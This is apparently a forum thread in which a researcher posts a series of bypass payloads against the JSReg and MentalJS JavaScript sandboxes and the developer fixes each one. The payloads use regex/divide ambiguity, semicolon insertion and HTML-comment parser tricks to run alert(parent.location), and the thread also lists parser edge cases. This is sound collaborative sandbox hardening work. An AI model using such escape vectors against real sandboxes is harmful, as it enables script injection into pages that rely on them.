So I thought about supporting line/para etc and rewriting all my \s but then I decided to cut corners and normalize all spaces and new lines. Literal characters will be replaced but escaped ones should be allowed. Thanks again!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I suggest to add these non-FF spaces \u202f, \u205f to spaceChars regex
and do something with literal characters \u1680,\u180e,\u0085 (spaces in IE6-8) and \u0000,\ufffe \ufeff during normalization.

bugs:

1. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#196

2. variable regex has an invalid structure: /(?:[^\x00-\x7f[ \f\n\r\u000b\u2028\u2029]+...

3. this['f$oo']=1;'$f'+'oo' in this; // here must take into account the priority of operations

----------------------
~Veritas~



Edited 7 time(s). Last edit at 09/25/2011 07:52PM by LeverOne.

Thanks!

I've normalized those spaces and fixed the variable regex. The first bug is fixed but now toString/valueOf etc appears in the for loop so you have to use hasOwnProperty if you want to remove them from your code, to fix this I'll probably have to get the object the for loop is on and pass it to the function and same goes for the 3rd bug I need to know the indented object of "in" or somehow rewrite prop checks with $ automatically.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

1?{}:/='lo/,alert(parent.location)//'
~{x:/='/,lo:alert(parent.location)}//'

----------------------
~Veritas~



Edited 2 time(s). Last edit at 09/27/2011 04:12PM by LeverOne.

I'm quite embarrassed with this one :O, I knew when I modified the code to combine it with operators I'd forget something. The regex didn't check for colon and the operators didn't check if there was something left. So now I add the colon to the regex check and updated the operators check. Amazing skill with the exploit though since you realized all of the above :)

Update....
I've updated the operators completely and now done some detection for ++ and -- hopefully there won't be any new bugs but you never know I might have missed the obvious because of the new code.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/29/2011 11:43AM by Gareth Heyes.

0?/='lo/i:alert(parent.location)//'

----------------------
~Veritas~

Thanks again, clever! I've fixed it, I forgot about ternary for some reason I don't remember removing it from regexes but there you go.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

0?lo:/='/,alert(parent.location)//'

switch(1){case 1:{}/'lo/,alert(parent.location)}//'}  // default:{} <-- the same

bugs:

1.
i=1;i++
{}

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

3. ~{}

----
// I stopped to think about it, but the ideas still come to me.

Preventing future bypasses via unsupported statements.

When browsers will implement ES6 features, it will open some holes in the JSReg's parser. To fix this it's necessary, for example, save the protection ('$') in names for 'correctedOutput'.

To test this right now on FF (2+) I changed one line of JSReg.

iframe.contentWindow.document.write('<script type="text/javascript">' + code + '<\/script>');

// to

iframe.contentWindow.document.write('<script type="application/javascript;version=1.7">' + code + '<\/script>');

Obviously , these features will be available for "text/javascript" type with time.

// FF

with({'let':function(){}})let(i=1)/'/;/*';alert(window[1<!--i),('location'
]);/lo*/

!function(){with({'yield':1})yield/'/;/*';alert(window[1<!--0[0]),('location'
]);/lo*/}()

Test: [olo-olo-lo.narod.ru]

----

Quote

can you explain why this is a bug?

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.


----

Until the spring.

----------------------
~Veritas~



Edited 5 time(s). Last edit at 10/14/2011 06:31AM by LeverOne.

Damn thanks!

I think I better modify the states used into a whitelist approach for regex and divide.

Update...
Ugh, yeah all these new features are hard to tame. I wish you could down version them too, disable e4x etc I'll think about this. I'm working on the changes now.

Update++
Ok fixed those. I now force object literals when JSReg detects them. So x={} will become x=({}), I've added the version number for the script tag and now the corrected output has rewritten objects. Fixed those syntax bugs too.

Quote

2. http://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js#612

Please can you explain why this is a bug? I looked but I didn't understand your point since the regex parser is checking for the ending "/" and then looks for either img if neither character exists then it ends the regex parsing.

Quote

parseTree.push("RegExps(" + output + ")"); // <-- 'output' instead of 'regexOutput'. You've already corrected it.

LOL Well I corrected but unrelated to your post after noticing the output was wrong, then checked it afterwards and thought it was to do with the bit above that doh. It was 2am so I guess I confused myself and fixed it subconsciously.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 3 time(s). Last edit at 10/15/2011 04:54PM by Gareth Heyes.

Has it finally beat master lever one? Or are your excellent javascript martial art skills being fine tuned elsewhere?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

As I said above, I'll return to JSReg in March or April of 2012, I want to finish my look too, but I'm busy.

----------------------
~Veritas~

Ah sorry missed that, thanks for your hard work! I really appreciate it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

if(1)/**/{}/'//*'+function{1:lo}/'/,alert(parent.location))//*/-/'/

lo='@mozilla.org/js/function'; 
1<!--0[0];alert(lo: :['location']);

`if(1)/**/` and `<!--` are just some of the options to hide the wrong code at the stage of initial syntax checking. For this purpose can be used most of the violations listed in the next post.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/25/2012 07:45PM by LeverOne.

In this post I will list all incorrect changes in the original code (syntactic violations), which exist in the current version of the JSReg.

You can edit this post.

1)

this['f$oo']=1;'$f'+'oo' in this; // here must take into account the priority of operations

2)

switch(1){case 1:{} // <-- should be parsed as a block.
}

3)

switch(1){default:{} // <-- should be parsed as a block.
}

4)

if(0)/**/{} // <-- should be parsed as a block or f/statement (if it's a function)
else/**/{}
switch(0)/**/{default:0}
while(0)/**/{}
do{}while(0)/**/{}
for(;0;)/**/{}
with(0)/**/{}

5)

for(a in [])/**/{} should be equivalent to for(a in []){}

6)

return
{} // should be parsed as a block.

return /i/
{}

return /i/
a=1


for(;0;)continue
{}

for(;0;)break
{}


for(;0;)continue
a=1

for(;0;)break
a=1

x:for(;0;)continue x
/i/i // <-- reg.exp.

x:for(;0;)break x
/i/i


7)

i=1;
i+++i

i=1;
i++ +i

i=1;
i
+++i

8)

1.instanceof Number

1.E10

1 . E10
1 .E10
1. E10

1.[0]

1..x

9)

0[0]-->1

10)

for(;{}*0;)0
for(;function(){}*0;)0

for(;0;{})0

11) This problem can be fixed in the least, otherwise there may be breaks.

x:{} // well known but incorrect

if(0)function x(){} // etc

12)

var x=function(){'blalba'},z
(y)=1

13)

x=eval(1)
+1

14) `?:` takes special attention

0?{}/i:0 // look at parse tree



to be continued...

----------------------
~Veritas~



Edited 10 time(s). Last edit at 03/03/2012 02:51PM by LeverOne.

Wow :D

I really thought it would be hard for you to find a new bypass, this is sooooo cool. I'll rewrite JSReg to take into account these syntax mistakes and make the code better. Thanks!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I'll add one that I found a while ago but did not yet have time to explore:

/./iiin({}) // Chrome only

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Working on a complete rewrite, thanks for the great vectors! This convinced me that I need to have my own error checking and redo how I handle parenthesis etc. I dunno how long it will be since I have other work to do :( but should result in better code

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

I wrote a new parser

[www.thespanner.co.uk]

I've checked it against previous attacks and the syntax problems list from lever one. I should be in a better position to fix issues now since I can match paren expressions and object literals etc more easily.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 10/18/2012 07:30AM by Gareth Heyes.

Thank you! Soon I will look in detail at the new sandbox. At the moment I have three suggestions:
1. Run hack test on Opera or GC.
2. Do something with "<!--" and "-->".
3. Upload MentalJS on googlecode.

----------------------
~Veritas~

1. Doh. I've fixed the var statement stuff by adding it to current expression tracking.
2. Yeah ooops I need to sort that
3. Any reason you need it there? Easier for looking at code? I didn't get any code contributions from anyone last time so I didn't bother.

Update...
You might want to wait until I fix a lot of things :) need to restructure how function statements, function expressions and paren expressions work.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/19/2012 10:50AM by Gareth Heyes.

// Any reason you need it there?

I often compare the version to exactly understand how the problem has been fixed. Sometimes I add my code to see how the input data is overwritten. Sometimes I leave in the code my notes to remember in the future.

// You might want to wait until I fix a lot of things

ОК. I see the var statement fix was not complete. I follow this thread.

----------------------
~Veritas~

Fair enough I'll upload to google code, what license do you prefer? I consider you an owner of this project too since without you it would be nothing.

BTW your tests are amazing, have you considered releasing a js parser test suite? The edge cases are really really tricky to parse and a lot of other parsers have problems.

There is a new version uploaded now. I'll put it on google code when I get an answer about the license. Please add me on gtalk if you use it gazheyes [removemepleasethisis not needed at gmail dot com

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/22/2012 07:37AM by Gareth Heyes.

// I consider you an owner of this project

Thanks, but I cann't agree, because I know I'll not be doing commits. Choose a license on your own, please.

// have you considered releasing a js parser test suite

:) In my opinion it's more fun, when "a lot of other parsers have problems".

// add me on gtalk

I don't use gtalk.

----------------------
~Veritas~

Quote

:) In my opinion it's more fun, when "a lot of other parsers have problems".

XD

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/22/2012 08:42AM by Gareth Heyes.

function lo(){i//
in/1};alert(location)//1}      // !Opera

var y=function(){},lo          // !FF
/'/,alert(location)//'

this
function lo(){}/'/,alert(location)//'

var NaN
/'/,alert(location)//'      // !FF

Tests:

var i=i
/i/i,a

var x
(x)=123,x
/i/i

var i
{}

----------------------
~Veritas~



Edited 9 time(s). Last edit at 10/23/2012 05:26AM by LeverOne.

Ok arch nemesis I now force divide and regex and =/
Fixed those.

You have a new toy as well, dom api.
b=document.createElement('b');b.appendChild(document.createTextNode('hello world!'));document.querySelector('form').appendChild(b);

Update...
and jQuery :O

1. Hit load jQuery
2. Hit execute
3. $ now contains a reference to a sandboxed jQuery!!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 10/23/2012 09:29AM by Gareth Heyes.

I'm currently rewriting again but this time not relying on the browser to validate syntax. I'm going to write it all and unable us to define rules and hopefully fix these syntax based attacks. Oh and it should be even faster since I'm now using if statements and very limited amount of functions.

Update...
New version is up:
[www.businessinfo.co.uk]

Google code page:
[code.google.com]

You will notice the parsing is much faster now because I compare the charcodes directly and do a different method of parsing. I haven't got jQuery to work yet and ASI is still incomplete and I'm sure some missing syntax but I have my own validator now.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 11/06/2012 05:12PM by Gareth Heyes.

1<!--0[0];for(var lo
{}/alert(location,i=0)/i<!--lo;);

----------------------
~Veritas~



Edited 1 time(s). Last edit at 11/10/2012 06:48PM by LeverOne.

Niiiiice :) very cool exploit of my asi. I now check the context and insert a for semi instead of semi if require so the { becomes a object literal.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/11/2012 02:00PM by Gareth Heyes.

for(;0;)break
typeof/lo;alert(location)/+0

also continue + new, throw, delete, typeof

----------------------
~Veritas~



Edited 2 time(s). Last edit at 11/11/2012 11:48PM by LeverOne.